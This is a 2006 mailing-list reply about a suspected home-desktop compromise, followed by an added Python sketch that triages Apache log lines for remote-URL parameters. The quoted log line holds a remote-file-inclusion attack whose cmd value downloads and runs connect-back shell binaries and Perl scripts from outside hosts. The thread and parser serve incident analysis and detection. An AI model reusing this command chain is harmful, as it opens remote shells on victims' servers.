My home desktop was compromised, but how?

Guido Heumann listguido at web.de
Tue Feb 28 22:19:09 UTC 2006


On Tuesday, 28 February 2006 22:31, Michael J. Lynch wrote:
> Carthik Sharma wrote:
> > (The full line is :
> 
> > 192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
> > /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=c
> >om_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.9
> >8.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20
> >cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%2
> >0744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-
> >o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.
> >160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%
> >20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
> > HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> > 5.1;)"  )

I'm not an expert, but I don't think there's a problem here. If you take out 
the weird URL, you get

"GET /index2.php?option= ... HTTP/1.1" 404 303 "-" "Mozilla/4.0 ..."

As I read it, the 404 status code says file not found, so I think this is just 
a normal error log message from Apache that there's no file index2.php on 
your server. 


HTH,
Guido
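
Added example, not part of the original post: a Python sketch that parses an Apache combined-format access-log line like the one quoted above, reads the status code, and URL-decodes the query string to list any parameter whose value is a remote URL. The sample lines are constructed with documentation addresses, and `triage` and its verdict labels are names invented for this example.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)

def triage(line):
    """Parse one access-log line; the verdict labels are this example's own."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None  # not a combined-format line
    target = urlsplit(m['target'])
    params = []
    for pair in target.query.split('&'):
        name, _, value = pair.partition('=')
        params.append((unquote(name), unquote(value)))
    # A request parameter that carries a full URL is the remote-include pattern.
    remote = [(n, v) for n, v in params if REMOTE_URL.match(v)]
    status = int(m['status'])
    if not remote:
        verdict = 'no-remote-url-parameter'
    elif status == 404:
        verdict = 'probe-script-not-found'   # requested script does not exist
    elif 200 <= status < 300:
        verdict = 'probe-script-answered'    # script exists and replied: look closer
    else:
        verdict = 'probe-other-status'
    return {'host': m['host'], 'path': target.path, 'status': status,
            'remote_params': remote, 'params': dict(params), 'verdict': verdict}

# Constructed sample lines (documentation addresses), shaped like the quoted request.
AGENT = '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'
PROBE = ('GET /index2.php?option=com_content&mosConfig_absolute_path='
         'http://198.51.100.7/cmd.txt?&cmd=cd%20/tmp;echo%20YYY HTTP/1.1')
SAMPLES = [
    f'192.0.2.10 - - [26/Feb/2006:14:56:06 -0500] "{PROBE}" 404 303 {AGENT}',
    f'192.0.2.10 - - [26/Feb/2006:14:56:09 -0500] "{PROBE}" 200 5120 {AGENT}',
    f'192.0.2.44 - - [26/Feb/2006:15:01:12 -0500] '
    f'"GET /index.php?option=com_content&id=1 HTTP/1.1" 200 8841 {AGENT}',
]

if __name__ == '__main__':
    for sample in SAMPLES:
        r = triage(sample)
        print(r['status'], r['verdict'], r['remote_params'])
```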
